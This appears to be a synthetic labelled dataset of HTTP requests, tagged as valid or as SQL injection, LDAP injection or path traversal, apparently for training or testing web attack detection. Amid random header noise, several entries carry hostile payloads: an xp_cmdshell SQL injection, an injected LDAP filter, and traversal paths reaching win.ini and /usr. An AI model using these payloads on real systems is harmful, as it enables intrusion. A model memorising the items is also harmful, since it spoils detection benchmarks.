Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 168.224.75.14
Cookie: eoek=733541;aEcF=b+t delete;croace0=05
Cookie2: $Version="3"
Date: Fri, 16 Jun 06 05:34:00 GMT
ETag: W/"nqeS2aEaHXxMLY2Se"
Expect: xaui
From: nendeo@nesuf.ch
If-Modified-Since: Thu, 24 May 07 02:22:10 GMT
If-Unmodified-Since: Fri, 07 Aug 09 01:44:07 UTC
If-Match: "_0kCm02wi0ien2eO@"
If-None-Match: *
If-Range: "XJTINaKF_e2ksUF_"
Max-Forwards: 7
MIME-Version: 8.3
Pragma: Zn='ffhr'
Proxy-Authorization: NTLM QW9mM3l1YXZ0aXI3MHNsd3N1cmVkbnVTbnJoRGV3bHlkdWVlbmw=
Authorization: h6Ev nT8ree=Fo6slibt
Range: 967604-010774,-548402
Referer: http://nx6amn.gov/mdneaSn.mp3
TE: trailers,chunked;q=0.9,chunked
Trailer: If-Range
User-Agent: 7iunrapD/7.3.4
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: 6.1 118.102.198.56
Transfer-Encoding: deflate
Upgrade: deldgt/6.6
Warning: 539 221.202.18.198 "tncz1zcarcoriB" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19203
Start - Id: 32778
class: Valid
POST /u0vty.css? HTTP/1.1
Content-Length: 108
Content-Language: rau4t5hs,Y,c
Content-Encoding: compress
Content-Location: http://tdCl2sn.st/a8lImn9/eddeuz.png
Content-MD5: QnJFYXRwc2UwOXQzdG5lcA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Jul 05 13:27:11 GMT
Last-Modified: Tue, 15 Nov 05 11:15:55 UTC
Host: www.qddeErons.org:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: iso-8859-7;q=0.1, iso-10646-ucs-2, cp-936, big5;q=0.2, iso-8859-8-i;q=0.5
Accept-Encoding: deflate;q=0.2, deflate, compress;q=0.8
Accept-Language: t-uzXAiunH
Cache-Control: only-if-cached
Client-ip: 105.0.171.235
Cookie: ercnceekyatN=mHHerChaarDeueqjgu;eSupdryHgnntrue=7532311;IesoecinpEm=ht;usto3dachwe=lsxar;1irt=23433;oedoa=8030
Cookie2: $Version="575"
Date: Wed, 11 Jul 07 22:07:59 CET
ETag: "Yinajk@_Q-@G_cPmwPjA"
Expect: 100-continue
From: tat1a4z@I9Mfqr80t.gov
If-Modified-Since: Tue, 02 Feb 10 07:08:40 CET
If-Unmodified-Since: Thu, 15 May 08 16:30:06 CET
If-Match: *
If-None-Match: "z8E67wPj.JnkApq2"
If-Range: *
Max-Forwards: 87
MIME-Version: 7.8
Pragma: 2xtc='e'
Proxy-Authorization: Basic TG83aUk6Y3h4ZWE4Y3A=
Authorization: Digest response="4eBbaEDCFd8Adb30DEcfb719e9C2BDB6"
Range: 39-,156281-891264,-22
Referer: /eSH4hiLn/yaism3h/Tnrmeif/cohe5/rnSmCmd.mp3
TE: trailers,trailers
Trailer: Trailer
User-Agent: tmgtenTsy
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4217x4135
Via: FTP/3.0 105.172.88.236, 4Es/7.6 215.4.15.19, 3.6 232.203.123.227
Transfer-Encoding: deflate
Upgrade: teeo23/2.3, xnsmm/4.8, ier/8.7, vw4/5.1, a5enee/7.1
Warning: 585 232.224.186.123 "moFEY6Tiefdaxpeea5e" 
X-Forwarded-For: 4.132.206.75
X-Serial-Number: 635173454093357601
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hparnso=89021&eddhnsbGtatsc=9363648&uitDa=spees&TsEmd=tRJYvoMF1Hw&lArwit=/dTlNcopyconnecte0)e7e]iCA;

End - Id: 32778
Start - Id: 41118
class: SqlInjection
GET /p-6k0g6Bhcshs5B/HDWaxpAs/w@cand_QT/rtisoo8uon0ohu/ejDDqlB6Pt/wateeo8nldfer6asca/egetTRqeeaha2TNa/eBfA1lZY7t4F/stylejTfSQgreplacemx/ntsgctae/uq/i_Hxmmt6L.png?otto=aEMxtHd&li=i-lte&Ejrht=leo&sviar=nhanTeoa+robjectt&rF.ElinkJ_uvusrT1=08&jmdt7Si=t.2d&cmfiiVEbroYhe=2&whdnbwyc=weODrjsr&NLMX0xtermH4=E+y%242iabtp2%40F&m4fTtitet7RkIi5=itbteuAle&cuierqeruln8Go=703&owtTc=orsYa74azu3rsF&meBbPV=%27%3BEXEC+++master.dbo.xp_cmdshell++%27cmd.exe HTTP/1.0
Host: 242.204.202.35
Connection: keep-alive
Accept: application/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, gzip, compress
Accept-Language: 1iywsif-0vdstpt;q=0.7, 7rosroej-lepnoS;q=0.0, qaao-n2, nhi-Ei43t, 2binL-eitnn7
Cache-Control: only-if-cached
Client-ip: 252.114.224.184
Cookie: Ionnla=no fE@ul;euparnEemin82s=r rorzuten;de2saoiemn1t=5Mad7thotT
Cookie2: $Version="75"
Date: Fri, 02 Nov 07 05:49:18 GMT
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: a3snhd
From: ljbnc@t4tt.net
If-Modified-Since: Fri, 11 Aug 06 23:35:37 CET
If-Unmodified-Since: Thu, 25 Mar 04 07:15:55 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Oct 06 17:36:48 UTC
Max-Forwards: 50
MIME-Version: 3.1
Pragma: Esi=nft
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Basic ZWR4YWM6YnR5YTI=
Range: -397
Referer: http://0rboe.biz/ia6wh/0Est/8w3tl.doc
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 0.4; nw-o3; rv:9.6.4) Gecko/93992547
UA-CPU: StrongARM
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5422x020
Via: 2.1 40.119.182.71
Transfer-Encoding: compress
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 247.25.143.27
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41118
Start - Id: 45016
class: PathTransversal
POST /atZgri85afVSgp/ujxzPvFWgO9kxZMa.tiff? HTTP/1.0
Content-Length: 164
Content-Language: tss,ec
Content-Encoding: deflate
Content-Location: http://www.4tdhnn.com/E7nmr/duoneeo8.php
Content-MD5: a0xtZTBzcG90ZVN0U25lbA==
Content-Type: application/x-www-form-urlencoded
Host: www.dudhia.biz
Connection: close
Accept: */*;q=0.5
Accept-Encoding: 
Accept-Language: *
Cookie: iieer3eHrjba=732;beeeirieofNelf=stf6tNwiyoxi;wna28usij=jBawl;rjrtxtz=06905472
Date: Wed, 27 Apr 05 17:14:31 GMT
ETag: "U_ur8zwGDcFU9al"
If-Match: *
Max-Forwards: 961
Range: 1-,899478-
Referer: /itnrrYoc/osesd/mRbe8re/dufNa/shrzmlL.php4
User-Agent: file:///0:/or/ye/ctsa.xml
----: ----------------------------------------

-JfxBJ=70509528&WIbgsoundb@BPs=rioier&Nl87roT5ytr=3324255&jZyq0mYU=0519&u53nacavacy3dee=h&Rqed=aUS9&6_n1Zlj4=x7UQp&so=39375869&UNbinVtelnetFZOP=childsot9&s1neNmhV

End - Id: 45016
Start - Id: 6057
class: Valid
PUT /hEoo8byoeksrTsg/lZ1.l%uEgFCmocha1/jnltm1vashasoegdleuT/2XOikrUG.dll? HTTP/1.1
Content-Length: 289
Content-Language: 5,asi
Content-Encoding: compress
Content-Location: http://laeeS.cz/3sriaet.jpeg
Content-MD5: bGVnc3JlbGVzbmU4b2luaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 20 Jun 05 09:14:19 GMT
Last-Modified: Sun, 27 Aug 06 07:01:16 GMT
Host: www.etoehrdmgd.cz:8
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.2, compress;q=0.8
Accept-Language: 20-eaHvtls, nte-e2z2m, UlnoG-0s, 3wi6lmHe-c9;q=0.7, aayfa-ieeswt;q=0.5
Cache-Control: min-fresh=109
Client-ip: 149.87.24.213
Cookie: taEoDesto=122;7htpasslsAzhk=skeeipR4oaws;documentDeAIPHYnetcatm= Rrh ijtvTfOl;i1lr ;ri=ix8kQE@hRU4;hcqhe=bniwUr0pvV
Cookie2: $Version="45"
Date: Sat, 09 Sep 06 16:18:01 CET
ETag: W/"KupoHWGnsJVxVrGK7i."
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Mon, 19 Dec 05 14:42:26 UTC
If-Unmodified-Since: Wed, 07 May 08 09:37:05 GMT
If-Match: "tjqbUZCpDq6GCkLuGTw8"
If-None-Match: *
If-Range: Sat, 05 Apr 08 18:49:45 UTC
Max-Forwards: 19
MIME-Version: 3.9
Pragma: itrrs='daD'
Proxy-Authorization: IEaq ghnuWgnb=dheobaz4
Authorization: Basic ZXMxdDp3M3NpYXVudA==
Range: -49420,-860
Referer: /qaetiqe/ytef.php3
TE: trailers,chunked;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.3 (Windows; U; WinNT 6.2; ce-nn; rv:2.5.8) Gecko/04207051
UA-CPU: StrongARM
UA-Disp: 6911,1089,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 179x0676
Via: 4.8 www.or5Aanto.jpg, eeEp/2.0 www.eipsviA.css
Transfer-Encoding: identity
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 497 56.128.16.254 "srleiwfnruIct" 
X-Forwarded-For: 162.114.213.90
X-Serial-Number: 172658995199339
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ness=714&9ATEq=031&esranTaen0tc6=%l&MarEdnatrsa=5EinqrbgsoundYtt&lso0l7d7lN=2Mhtfromnii8e&Ybj.usrj0VEcmdo-=b-0Bq&NoAapefmeaeot=oaeuiEpbhavicnsaod&gnoer4=[ln&csSeososltvt=auoua9esprgdelh&n5eeS=25405070&scriptGop=dYploQgI3UD&hnh4nLi=nmg8t&fHtelnetIZn=-lj3tc9&hnddht=zO6Ra7lyn&oxc9go= eSe

End - Id: 6057
Start - Id: 10094
class: Valid
GET /i0Vo/i1.-121QD.pwZZ.UbNLX/l1Afw9YXPiJpve/8271/utxtfnMLmSdocument/otjMx.GcY7zkc@i.mspx?UiwlikefSnPu=687&xoh4can0rd=327&BGUIU9F64a=titmiogs3gme&it=yt&iir9tm=hsbesoevsiframenn&iEcsrk=11542&lnT=tzr_ItAL_M&mu69=+e2t&dlw29dyaL4sd=emlfinsertngsx8nqo&SVHLtelnetS=0045318&Bo7logxp_trwNE=8 HTTP/1.0
Host: 118.198.39.36
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: c2arncmh-hp6rwqa;q=0.6, jhrniEih-eoa, paal-elehs;q=0.6
Cache-Control: no-transform
Client-ip: 251.140.55.187
Cookie: ro5ol=0542707;echoGamail=<ieeh s
Cookie2: $Version="4"
Date: Tue, 04 Mar 08 19:36:11 CET
ETag: W/"46a3uowHMI8pCi.mXy"
Expect: 100-continue
From: cpsF@ecrt6wy.ch
If-Modified-Since: Fri, 19 Sep 08 10:41:28 CET
If-Unmodified-Since: Mon, 14 Apr 08 24:50:29 CET
If-Match: *
If-None-Match: "U8nyqZZu2OCyOyp"
If-Range: Mon, 02 Feb 09 21:02:23 UTC
Max-Forwards: 441
MIME-Version: 3.2
Pragma: sea=onttteem
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: NTLM bXllbHR3Z250dHdub2xhMDdhZ2dhd2gxbm83NWlzaWV2bmNpNWE=
Range: 2-,2991-737219
Referer: http://moec.org/nn4agp.mpg
TE: trailers
Trailer: If-Match
User-Agent: ex6tIAD98m http://www.ash5.fr
UA-CPU: 68000
UA-Disp: 886,964,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9723x8891
Via: 4.4 209.92.162.230, 9.6 204.21.198.110:9, 7.1 196.104.119.22
Transfer-Encoding: gzip
Upgrade: Nraco/5.1, 3tms/3.4
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 78634326822916597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 10094
Start - Id: 37271
class: LdapInjection
GET /eGWYkpuLD0g5/uV-LgT3@jCGunJSP4EX/t9vbMFciSyEJ_JP/nimrwxEgolcoahl/obaesossepRihtb/yoTCG56t/uIkh/rIniS/kXL_toviochild8rd/n1apkaopRyu/1bVEk.Ce2/ssTYitsaridrncEelgR.html?tmmqmeOe1ikeRo=oolnotE&6eehdebEetC3ge=859814&589FformX.=3331812931&fsSsnydsdwahes=%29++++%28+++%7C++++%28++cn%3D*o++++%27brien*++%29%28mail+++%3D*o++%27brien*+%29+++&0tto9a4eosnwast=itivitw&a1ieikuitTylnaN=iSat HTTP/1.1
Host: www.dunreb.net:80960
Connection: close
Accept: text/xml;q=0.6, image/png;q=0.4
Accept-Charset: windows-874;q=0.1, cp-936, windows-1254;q=0.8, x-mac-icelandic
Accept-Encoding: identity;q=0.2
Accept-Language: g-ersc;q=0.6, or-ted;q=0.7
Cache-Control: no-store
Cookie: grhlntsgio=4197;3ntssoeig1=group byall;AaLladmin=tmaer18etd;wqPcR4x19WSb=2qf0;dsyBl6L=3256
Date: Tue, 14 Dec 04 12:47:36 UTC
If-Unmodified-Since: Wed, 08 Sep 04 13:05:58 UTC
If-Match: "bFfQON40ny2k8PS"
If-None-Match: *
Max-Forwards: 40
Pragma: no-cache
Authorization: Digest nonce
Referer: http://zoepiaH.de/6nbe/ru3dtl/oohuscW/Et1ffF/rrsn5Irh.jpeg
TE: trailers,chunked
User-Agent: szzth/4.9.2.3.4
UA-CPU: PowerPC
Via: oysbtm/1.4 www.3ahe.htm
Transfer-Encoding: identity
Warning: 137 229.39.207.131 "Sreytingsz" 

null

End - Id: 37271
Start - Id: 30749
class: Valid
GET /lJXFy./8txejlifetnv/5ete/voiniekaoe/6B9-7BZ2StpVdF/xB6jdprocessing-instructioncat9servicesR/egK06/oHMQupUvN9.HyD8.sh?er3a7eidrsro=6940630&alrbtH=ikg3ULwH&JUmNMMy7=varzcchildta&nfg=06763&lTete=t-l&eW=c%40mk&stcscRnt7=dyretsonU2jhese29&Aetdxsmag=aGtaxo&tUhE=sg2suYnottTwa9lt%3D9ofrom&1V1Q=hrnobjqb6Sh HTTP/1.1
Host: www.tesd.biz
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8, iso-8859-2;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: DldoRein-tIe
Cache-Control: no-transform
Client-ip: 34.154.121.28
Cookie: ih1iscdtEvEc=exh;ephn0g1Sgmiru=ig;2uo6au3lxtmd=;=asolscriptv;s2tr9eprelocr=eS6uo
Cookie2: $Version="646"
Date: Mon, 27 Nov 06 21:36:31 GMT
ETag: W/"bVHtsGwoY.jqZw51ltfZ"
Expect: niga9dL
From: dubt@tmrdi.net
If-Modified-Since: Thu, 20 Mar 08 01:30:31 GMT
If-Unmodified-Since: Sun, 13 Feb 05 10:45:16 GMT
If-Match: *
If-None-Match: "u@p7ES7yHJwzNhYQHK"
If-Range: Fri, 24 Apr 09 09:09:17 CET
Max-Forwards: 430
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic SW5ZZHJxOjdpbWxyZQ==
Authorization: NTLM ejVpNnJvZ2NuYnRtdHR0Y2FocnU0MGx1dG9SaWZpcjVhd2xsaXh4aQ==
Range: -62284,291093-4,3-
Referer: http://dtll3r.cz/aood/idoab9kr/cKeG1a6a/eebhiic/1Hngea0s.pl
TE: deflate;q=0.6,trailers
Trailer: Proxy-Authorization
User-Agent: eleNbbg7Wu http://www.use9e.fr
UA-CPU: PowerPC
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: FTP/1.5 www.ExelhP.gif, FTP/8.7 100.17.162.113, HTTP/8.1 239.124.207.38
Transfer-Encoding: compress
Upgrade: nho/3.1, hrp4P/7.9, rooiEU/7.1, tryrn/3.8
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 567820794809201
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30749
Start - Id: 12342
class: Valid
GET /NoA.xeis__iV/nph-Fxzb/ng5J/3Nt/eEs6dabthxiaTs/iiIdxsi0ea/tLTpmYMltOS8Bnl-/gGS/y6XVd6UBg8G1/sc/ta8ugtZ6TlB5dRWJm7fZ/pwHvj0S.gif?samI-hxmlZq=c%27&HahiTldbrta7Ic=44&w98ehtfiagaeto=337&M3s=8020&Idhe=a_p.D&Q7zbI2uB=tqnik4hyq&mochaLNzuaW=tn&cfrm=f+&dropLtmpqNGwtQ=9+cUif3ts4sshutdownib&tltne=23207&enediuf=unsic&n5l=tbzexa&iaNoLn4na=e_NJ_%40ioE&gniixoDaYf=f HTTP/1.1
Host: www.ardiHeSa4i.uk
Connection: close
Accept: application/*;q=0.4, image/*;q=0.0, image/jpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cidzelEx-cy9ts, audsiaw-R, nsd9fzh-bH;q=0.9, rY-etddA;q=0.4, seo-8t;q=0.9
Cache-Control: Jm=eauerr
Client-ip: 219.43.180.17
Cookie: t3o5asnel1ayd=4439;uglrsdmya4nn6=etYustEdkmE'uu
Cookie2: $Version="16"
Date: Sun, 16 Jul 06 04:08:38 UTC
ETag: W/"XXk-.8rcqs.YcAa3gY"
Expect: e7evcu
From: mehes@rstuth.com
If-Modified-Since: Thu, 18 May 06 13:15:23 GMT
If-Unmodified-Since: Thu, 17 Sep 09 04:16:36 CET
If-Match: "vkeY@Jt8R_iPJOv"
If-None-Match: *
If-Range: Tue, 10 Oct 06 01:33:48 GMT
Max-Forwards: 88
MIME-Version: 0.6
Pragma: eeow='Hd'
Proxy-Authorization: Basic aW5uZWtjaTpibnN0dTU=
Authorization: Basic b2FhY3F6QTpuZmhiaA==
Range: 662-4,8147-,483669-546
Referer: http://www.eznNoOt.ch/8TeiHuTu.cgi
TE: gzip
Trailer: Transfer-Encoding
User-Agent: aaxeeugsO/8.2.3.9
UA-CPU: x86
UA-Disp: 1376,5433,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8258x863
Via: 9.2 www.e6dmi.shtml, HTTP/2.6 149.190.203.175
Transfer-Encoding: gzip
Upgrade: got9/5.0
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 7559329085977019735
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12342
Start - Id: 10533
class: Valid
GET /iDci4n/5nseoxbfircIp/sw7h1Ugb_BnRYU/Qc2ymw/t0sooudwgAifafiea/aEJx_WgUuHef3sS0gU6H.tiff?noue=eeaseeumt&cNfeadshiUhzni=719&26OEzwlikeB9=597476&1ieoex3rscttr=fImochaj&tIadz4=742410586&le=3anv&sgyioInrsh=seD&i2nremofa=s9cmrtIan&nstroeeihter=8&eiJrz=omir%24nc%24a7peA&mry5na=otelneteatprocessing-instructionEreats HTTP/1.0
Host: www.ooro.cz
Connection: lnVikr
Accept: image/*, video/*;q=0.2, text/html
Accept-Charset: x-mac-icelandic, windows-1251, iso-2022-jp, x-mac-hebrew;q=0.9, cp-936
Accept-Encoding: *
Accept-Language: op-snq, cslti-ese;q=0.3, es2kn-h6s;q=0.1, DeeadlB-r;q=0.9, doSemiSm-e
Cache-Control: max-stale=75
Client-ip: 167.183.169.101
Cookie: lOlRi=eeaohstoeeijij;orsr=84;hIsileb=itomtsn48tapxI;sfhteierytmt8p=wssNan4hebwpldSo;3ehjbEahefq=4371;toabermtdlLdx=9
Cookie2: $Version="412"
Date: Sun, 04 Nov 07 22:11:40 CET
ETag: W/"XM8TVP_5vfxZ0MSwv"
Expect: 100-continue
From: oteu@5ieOnnk.biz
If-Modified-Since: Sat, 27 May 06 05:30:19 GMT
If-Unmodified-Since: Thu, 09 Feb 06 04:48:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZXJlcG5lcWZ3ZW9UeXNhbjNVanl0Z2FucHBpYnNpYWlkZ2puZWJwb2Job1RtZg==
Range: -8188
Referer: /Md0m/10eTe3/ettyeh.mdb
TE: deflate,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: nvLsiil06ruwt
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4657x757
Via: 7.4 www.ehlEr.shtml:109
Transfer-Encoding: deflate
Upgrade: Nf5rt/6.5, ioEY0/5.3, 30O/5.0, Taonn/0.0, rrsr8/6.3
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 67839839
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10533
Start - Id: 2487
class: Valid
GET /cli1e/3zwXiC/lxjYHiu@y4I/adoSEFCRD9TpPI/pe8mewrneeoNr9pb/ht4l2naibfcpnsoruj/dLjneo2lncti.gif?0y9NfuoC6l=j6we&oOs=710&xrhedol=foi4twra5h HTTP/1.0
Host: 15.99.30.67
Connection: wdajF7
Accept: image/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 4uhott-m4o64oQ, rdrra-owt, peeeye-e;q=0.2
Cache-Control: only-if-cached
Client-ip: 100.174.188.163
Cookie: gzoyOi3xannS9=;ra3t;ichuy9o=5186;Awatlrc=66685
Cookie2: $Version="490"
Date: Wed, 27 Jun 07 12:05:00 GMT
ETag: W/"v7wXbGXa2_39d3H2aRx"
Expect: 100-continue
From: iUreeh@eetzlt4cr.gov
If-Modified-Since: Sat, 07 Feb 04 03:28:28 GMT
If-Unmodified-Since: Fri, 20 Feb 04 17:59:21 UTC
If-Match: "2bBAAEmCvKvhdNDWnk"
If-None-Match: "tkqkU-o7WS-WxHwZsTo8"
If-Range: *
Max-Forwards: 1
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest response="EfC279DaFeD6E97AE1b75a78EAB78afF"
Authorization: NTLM b3JldnN5czVoNXN1aW5uSG1zbGF0aDFudGVhYXJwcmlhNWF0YXI=
Range: 0555-2,778762-,232388-
Referer: http://Rctm.gov/tastaRu/dohud/Ulzt/1mglo3y/Tbaelis.js
TE: trailers
Trailer: Date
User-Agent: r1pnjndr
UA-CPU: PowerPC
UA-Disp: 548,8459,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 392x1193
Via: 3.1 107.167.152.1
Transfer-Encoding: compress
Upgrade: tig/6.9, Enn6b4/1.7, cc51/4.1
Warning: 498 158.224.222.62 "n9caasp5evdsDan" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 347745233258688600
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2487
Start - Id: 4330
class: Valid
POST /ote1fbfsianrojtald.jsp? HTTP/1.0
Content-Length: 243
Content-Language: ntlo5fy
Content-Encoding: compress
Content-Location: /ayjOxas/sqhett.php3
Content-MD5: c3Qzc1RkQWVlZUdydGJkUw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Sat, 16 Oct 04 17:14:16 CET
Host: 241.194.5.84
Connection: ns4ii
Accept: */*;q=0.6
Accept-Charset: iso-2022-jp;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: e=ebhe
Client-ip: 67.250.58.132
Cookie: Zw3iconnectPPuItf9=141;4obhne=5378
Cookie2: $Version="10"
Date: Tue, 04 Nov 08 15:01:58 CET
ETag: W/"OZ9ceq8ffV5-KSX"
Expect: 100-continue
From: 5soaa@eElhadti.fr
If-Modified-Since: Tue, 13 Oct 09 18:50:24 CET
If-Unmodified-Since: Sat, 21 Jul 07 11:58:19 CET
If-Match: *
If-None-Match: "Q5zJ4xsGX6_Von355-f2"
If-Range: "JS5yfkgwivBD_E_qH8Eu"
Max-Forwards: 64
MIME-Version: 1.7
Pragma: eewgic='sn'
Proxy-Authorization: Digest nonce
Authorization: NTLM dGhOS1phYWRyVXdBZWRyZXJzaWhtYW85dUU5dWFyaG50eQ==
Range: -6985,-5545,-0
Referer: /rnhfxi/UcnOd8.php3
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: 5U8EVtu http://www.qtmtrc.it
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8501x1867
Via: 2.9 www.tlgrer.html, HTTP/9.6 59.52.53.215:53344, 8.4 www.helyn.css:77
Transfer-Encoding: gzip
Upgrade: esgn/6.8, ei1l/5.1, redat/5.0, 10g/8.4
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 936770860
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oSt4=3C75&bint4YKbwOqKB5=nobjectryc'&lt4U1GjV=ehjdjeabsr16Li&0Vla=rra&Stefhrbbdte1iar=hdnst2aEtRo&3cn3eoefhevi9o=f0&oiFsu=qp>&yaxtqf=ah7o6yhmeraxtrta&vP.usrJ_X= stt&dstrBtE=s@PCb&ivHmaeiRssv=Mservicest:5 <(8wr>et&rtedFmh=94565624

End - Id: 4330
Start - Id: 44777
class: PathTransversal
GET /xakv11Y_JlH/CWiJ@3autoexec8xlsnph-wfE/nWFOZao.png?dntF0llia=5012&LgBL_system=ewerii&Ih3rn8=fhkdmoee&thns37tRiladee=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml HTTP/1.0
Host: 6.134.50.132
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: mN83D-3eh5Dt;q=0.6
Cache-Control: min-fresh=90331
Client-ip: 7.176.110.139
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="8"
Date: Mon, 16 Nov 09 13:08:33 CET
ETag: W/"1moiL3zP1yW7wCq50"
Expect: 100-continue
From: iddCt@3ahi.gov
If-Modified-Since: Wed, 27 Dec 06 21:57:59 CET
If-Unmodified-Since: Sat, 09 Apr 05 10:30:57 GMT
If-Match: "fp6Z_ZBx9qsx@aE4cZ"
If-None-Match: *
If-Range: "kkjXyaYb9_QMuAyd@wAE"
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 6578-336232,-258470,45228-5909
Referer: /tssrutoo/ze8arlsn/yrng.jsp
TE: trailers,deflate
Trailer: Date
User-Agent: tsfreroCE/6.3.8
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: compress
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44777
Start - Id: 45126
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: 142.144.171.217:867
Connection: ntyirtl
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.1, identity;q=0.8, gzip, deflate, deflate
Accept-Language: s-e8ibs, duek-yet;q=0.8
Cache-Control: min-fresh=423
Client-ip: 223.196.253.50
Cookie: htrm7rNhnib=lslek;trM=uooDI~wp-ydfdn;sne=311842;homeuUiqV.NZk=91616317;wOmoPvl=691609;retst=t-Wt9tnmX
Cookie2: $Version="70"
Date: Sun, 22 Oct 06 01:31:07 CET
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: Leorvry
From: lmfapce@abHed.be
If-Modified-Since: Fri, 24 Aug 07 20:57:26 GMT
If-Unmodified-Since: Thu, 08 Apr 10 20:05:06 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 2
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic Y2pUNTpTNm9x
Range: -3,456-488022
Referer: http://kc0nhdqe.gov/ieea/gi95s/tarr9/poAcs/mmzlan.cfm
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: rprqqMYIeM http://www.qEsf.fr
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
